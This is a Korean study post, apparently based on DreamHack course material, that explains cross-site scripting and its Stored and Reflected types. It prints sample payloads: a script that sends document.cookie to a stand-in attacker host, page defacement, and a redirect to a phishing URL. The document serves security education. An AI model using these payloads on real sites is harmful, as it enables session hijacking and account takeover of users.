ClientSide: XSS

XSS(Cross Site Scripting)이란?

XSS란 웹 페이지의 이용자를 대상으로 공격할 수 있는 취약점!

 

해당 종류의 취약점을 통해 이용자를 식별할 세션 및 쿠키 정보 탈취, 해당 계정에 임의 기능 수행함

Cross Site Scripting의 약어가 XSS인 이유

 Cross Site Scripting의 약어는 CSS가 옳지만, 스타일시트를 정의하는 언어
CSS와의 중복과 혼동으로 XSS로 명명되었습니다 ㅠ

---

XSS

XSS는 클라이언트 사이드 취약점의 대표적인 취약점입니다.
공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에 해당 스크립트 실행할 수 있지요
공격자는 해당 취약점을 통해 세션 정보 탈취 해당 계정으로 임의의 기능을 수행합니다.

예로 위와 같은 이미지가 있습니다. 오리진 권한으로 악성 스크립트 삽입
이후 이용자가 악성 스크립트가 포함된 페이지 방문 후
공격자가 임의로 삽입한 스크립트 실행 쿠키 및 세션 탈취 이러한 위험한 문제가 있습니다.

 

해당 취약점은 SOP 보안 정책의 등장으로 서로 다른 오리진에서는 정보 읽기 행위가 힘들어집니다.
그러나 이를 우회하는 다양한 기술이 소개되며 XSS 공격은 지속되고 있습니다.
이제 해당 취약점의 발생 상황과 종류에 대하여 알아볼까요? 

---

XSS 발생 예시와 종류

XSS 공격은 이용자가 삽입한 내용을 출력하는 기능에서 발생합니다.
예시로 보이스피싱이나 스팸 등의 기본적인 내용이 대표적인 예시입니다.

 

클라이언트는 HTTP 형식으로 웹 서버에 리소스를 요청하고 서버로부터 받은 응답
즉, HTML, CSS, JS 등의 웹 리소스를 시각화하여 이용자에게 보여줍니다.

 

이때, 위와 같은 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지 확인/스크립트 실행이 됨
이는 아래 예시 이미지를 보시면 확인 할 수 있습니다.

XSS는 발생 형태에 따라 다양한 종류로 구분됩니다. 아례 표를 보시고 참고하시면 됩니다 ㅎ

---

XSS 스크립트의 예시

JS는 웹 문서의 동작을 정의하며, 이는 이용자가 버튼 클릭 시에 어떤 이벤트를 발생시킬지와
데이터 입력 시 해당 데이터를 전송하는 이벤트를 구현할 수 있습니다.

 

이러한 기능 외에도 이용자와의 상호 작용 없이 이용자의 권한으로 정보 조회, 변경 등의 행위가 있죠
이런 조작이 가능한 이유는 식별자인 세션 및 쿠키가 웹 브라우저에 저장되어 있기 때문!
따라서 공격자는 JS를 통해 다양한 행위를 하며, 조작 할 수 있습니다.

 

JS는 다양한 동작을 정의하기에 XSS공격에 주로 사용되며 태그론 <script>가 있습니다.
아래 코드들은 JS를 이용한 XSS 공격 코드 예시입니다.

쿠키 및 세션 탈취 공격 코드

<script>
// "hello" 문자열 alert 실행.
alert("hello");

// 현재 페이지의 쿠키(return type: string)
document.cookie; 

// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);

// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";

// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>

페이지 변조 공격 코드

<script>
// 이용자의 페이지 정보에 접근.
document;

// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>

위치 이동 공격 코드

<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing"; 

// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>

---

Stored XSS

해당 취약점은 서버의 DB 또는 파일 등의 형태로 저장된 악성 스크리브 조회 시 발생함
대표적으로 게시물과 댓글에 악성 스크립트를 포함 업로드하는 방식이죠
게시물은 불특정 다수에게 보여지기 때문에 해당 기능에 XSS 취약점이 존재시 파급력 ↑

 

아래 이미지는 예시로써, <script> 태그 또는 HTML 태그를 삽입하고 반환되는 HTML 코드를
확인함으로써 Stored XSS의 발생 형태를 확인할 수 있습니다.

누르면 지금은 모달창에 뜨기만 하지만 실제론 세션 등의 정보를 탈취하겠죠..

---

Reflected XSS

서버가 악성 스크립트가 담긴 요청을 출력 시 발생!
대표적으로 게시판에 작성된 게시물을 조회하기 위한 검색창에 스크립트를 포함해 검색하는 방식
이용자가 게시물을 검색 시 서버는 검색 결과를 이용자에게 반환하는 특징을 악용한 사례죠

 

Reflected XSS는 Stored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생!
따라서 공격을 위해선 타 이용자에게 악성 스크립트가 포함된 링크에 접속하게 유도합니다.
주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용한답니다.

 

아례 예제는 게시물 조회 기능으로 <script>태그 또는.. 그런 걸로 Reflected XSS발생해볼까요?

여기선 퀴리문에 직접 넣어서 하는 부분이네요 보통은 필터링으로 거르기도 하겠죠?

---

결론

• Cross Site Scripting (XSS): 클라이언트 사이드 취약점
  - 공격자가 웹 리소스에 악성 스크립트를 삽입 이용자의 웹 브라우저에서 해당 스크립트를 실행한 취약점
• Stored XSS: 악성 스크립트가 서버 내에 존재
  - 이용자가 저장된 악성 스크립트를 조회할 때 발생
• Reflected XSS: 악성 스크립트가 이용자 요청 내에 존재
  - 이용자가 악성 스크립트가 포함된 요청을 보낸 후 응답을 출력할 때 발생

---

참고 자료

ClientSide: XSS

참고 이미지